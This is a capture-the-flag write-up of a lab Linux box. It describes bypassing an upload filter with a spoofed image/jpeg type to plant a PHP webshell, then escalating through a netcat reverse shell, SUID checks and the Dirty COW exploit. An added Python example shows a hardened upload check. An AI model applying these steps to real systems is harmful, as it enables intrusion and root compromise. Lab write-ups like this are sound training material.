My Attempt

User.txt

Enumeration

After discovering that port 80 is open, I used dirsearch to go through the directories. dirsearch revealed only the /test directory, which shows the PHP information page.

Following writeup

In the writeup, gobuster was used instead and it discovered two other directories, /torrent and /rename. Following the writeup, I tried to access the /torrent file and followed the writeup to upload a torrent file. First I had to create a dummy account with the credentials "test:test" to log in to the control panel.

By navigating to the Upload section, I was presented with an upload page. According to the writeup, the page only allows legitimate torrent files to be uploaded. I used one of the torrent files from the Kali Linux download page and uploaded the file.

Then by editing the torrent, I was able to upload a PHP webshell through the update screenshot section.

Manipulating File Type

The trick was to intercept the upload request through Burp Suite and change the upload type of the file to image/jpeg. This way the server will think that the file is an image file and accept the upload.

Then from the torrent file page we can find the link to the PHP webshell.

Now we have command execution.
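The weakness described above is an upload filter that believes the type the client declares. As an added example (not code from the target application or the writeup), the sketch below models that check next to a hardened one that ignores the declared type, compares the file's leading bytes with an extension allowlist, and picks the stored name itself; the function names and sample uploads are assumptions constructed for illustration.

```python
import os
import secrets

# Leading bytes of the image formats the screenshot field should accept.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
DECLARED_IMAGE_TYPES = {"image/jpeg", "image/png", "image/gif"}


def weak_check(declared_type: str) -> bool:
    """Model of the check as described: trusts the client-sent Content-Type."""
    return declared_type in DECLARED_IMAGE_TYPES


def sniff_image(data: bytes):
    """Return the canonical extension matching the leading bytes, or None."""
    for ext, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return ext
    return None


def hardened_check(filename: str, declared_type: str, data: bytes):
    """Return a server-chosen storage name, or None if the upload is rejected.

    declared_type is ignored on purpose: the client controls it.
    """
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    ext = "jpg" if ext == "jpeg" else ext
    detected = sniff_image(data)
    # Reject unless the extension is allowed AND agrees with the content.
    if ext not in MAGIC or detected != ext:
        return None
    # Never reuse the client's name: a random name with a fixed image
    # extension cannot end in .php.
    return f"{secrets.token_hex(16)}.{detected}"


# Constructed samples: a harmless PHP file sent with a forged image type,
# and the first bytes of a JPEG.
PHP_UPLOAD = ("shot.php", "image/jpeg", b"<?php echo 'constructed sample'; ?>")
JPEG_UPLOAD = ("shot.jpeg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")

if __name__ == "__main__":
    print("weak check accepts PHP upload:", weak_check(PHP_UPLOAD[1]))
    print("hardened, PHP upload:", hardened_check(*PHP_UPLOAD))
    print("hardened, JPEG upload:", hardened_check(*JPEG_UPLOAD))
```

Magic bytes alone do not stop an image with PHP appended to it, so the server-chosen extension and an upload directory that never executes scripts carry the real weight.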

We can create a reverse shell by issuing a netcat command from the webshell. We will send the command through curl as shown below.

By setting up a listener on the Kali machine and issuing the command through the webshell, we can obtain a reverse shell.

We can spawn a tty shell using the following command.

The user.txt file can be found in the home folder of the user "george".

Root.txt

My typical first and second tries for Linux privilege escalation are always "sudo -l" and "find / -type f -perm -4000 2>/dev/null", to check whether I have sudo privileges or whether there are any SUID files. Unfortunately, no luck on both attempts.

In the home folder of george, there is an interesting zip file.

Upon further inspection, the file does not reveal useful information for privilege escalation.

This machine is running Linux kernel 2.6.31. By searching for the kernel version on Google, I was able to find a Dirty COW exploit for this Linux kernel version.

By uploading the exploit to the server, I was able to compile the code on the server and execute it.

The exploit hangs after I enter the new password. By reconnecting the reverse shell, we can see that the root user has been replaced by the "firefart" user.

Now by switching to the user "firefart", we can obtain a root shell.
